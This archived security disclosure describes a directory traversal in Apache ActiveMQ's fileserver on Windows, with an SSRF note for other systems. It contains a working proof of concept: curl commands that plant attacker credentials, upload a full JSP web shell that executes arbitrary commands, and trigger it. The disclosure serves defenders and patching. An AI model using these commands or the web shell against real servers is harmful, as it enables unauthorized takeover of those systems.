what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apache ActiveMQ 5.11.1 / 5.13.2 Directory Traversal / Command Execution

Apache ActiveMQ 5.11.1 / 5.13.2 Directory Traversal / Command Execution
Posted Dec 3, 2016
Authored by David Jorm

Apache ActiveMQ versions 5.11.1 and 5.13.2 suffer from command execution and directory traversal vulnerabilities.

tags | exploit, vulnerability, file inclusion
advisories | CVE-2015-1830, CVE-2016-3088
SHA-256 | af92593cd167e432ea1a2a76dc455bd4c971961c37ff8849eb0989167654bf38

Apache ActiveMQ 5.11.1 / 5.13.2 Directory Traversal / Command Execution

Change Mirror Download
I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. 

I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter.

An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.

Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:

<bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping">
<property name="constraint" ref="securityConstraint">
<property name="pathSpec" value="/api/*,/admin/*,*.jsp">
</property></property>
</bean>

Effectively blocking the upload of JSP files into contexts that will allow them to execute.

I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:

$ cat jetty-realm.properties hacker: hacker, admin
$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties

This seems to have the disadvantage of requiring a reboot of the server to take effect.

I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot.
The attacker can then take a standard JSP shell:

$ cat cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>

Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:

$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp

And pop a calc on the server:

$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe

Exploiting non-Windows servers

All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked.
That said, clients can specify the uploadUrl for a blob transfer, e.g.:

tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com

An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.

Resolution

The ActiveMQ project has released an advisory and patches.

This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind.

It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close